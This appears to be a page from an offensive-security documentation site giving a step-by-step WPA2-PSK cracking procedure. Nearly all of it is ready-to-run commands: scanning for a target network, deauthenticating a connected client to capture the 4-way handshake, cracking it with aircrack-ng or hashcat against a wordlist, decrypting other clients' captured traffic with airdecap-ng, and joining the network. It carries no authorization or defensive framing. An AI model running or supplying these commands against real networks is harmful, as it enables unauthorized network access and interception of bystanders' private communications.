> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WPA2

> Capture WPA2 4-way handshakes via deauthentication and crack the PSK offline with aircrack-ng.

## Overview

WPA2-PSK authentication uses a 4-way handshake to derive session keys. By forcing a client to reconnect (deauth attack), the handshake can be captured and cracked offline against a wordlist.

No active session or decryption of live traffic is needed, only the captured handshake file.

***

## Cracking WPA2

### 1. Find the WPA2 Network

Scan all bands to identify the target:

```bash theme={"dark"}
airodump-ng --band abg <WIFI-INTERFACE>
```

***

### 2. Focus on Target Network

Capture traffic and write to file:

```bash theme={"dark"}
airodump-ng -w wpa2-capture --bssid <BSSID> --channel <CHANNEL> <WIFI-INTERFACE>
```

Keep this running, handshake will be captured when a client reconnects.

***

### 3. Deauthenticate a Client

Force a connected client to disconnect and trigger a new handshake:

```bash theme={"dark"}
sudo aireplay-ng -0 5 -c <CLIENT-MAC> -a <BSSID> <WIFI-INTERFACE>
```

`airodump-ng` will display `WPA handshake: <BSSID>` in the top right when captured.

***

### 4. Crack the Handshake

Run a dictionary attack with `aircrack-ng`:

```bash theme={"dark"}
sudo aircrack-ng -w <WORDLIST> wpa2-capture-01.cap
```

Or with `hashcat` (mode 22000, recommended):

```bash theme={"dark"}
hcxpcapngtool wpa2-capture-01.cap -o hash.22000
hashcat -a 0 -m 22000 hash.22000 <WORDLIST> --force
```

Common wordlists: `/usr/share/wordlists/rockyou.txt`

***

## Decrypt Captured Traffic (airdecap-ng)

With the handshake and the cracked password, decrypt all post-handshake traffic to inspect plaintext communications:

```bash theme={"dark"}
airdecap-ng -e <SSID> -p <PASSWORD> wpa2-capture-01.cap
```

Opens a new file `wpa2-capture-01-dec.cap`. Open in Wireshark to inspect HTTP, DNS, and other traffic from connected clients.

***

## WPA2 Connection

`wpa_supplicant` config:

```
network={
    ssid="SSID"
    psk="password"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}
```

Connect:

```bash theme={"dark"}
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
```

Get an IP address:

```bash theme={"dark"}
sudo dhclient wlan0 -v
```
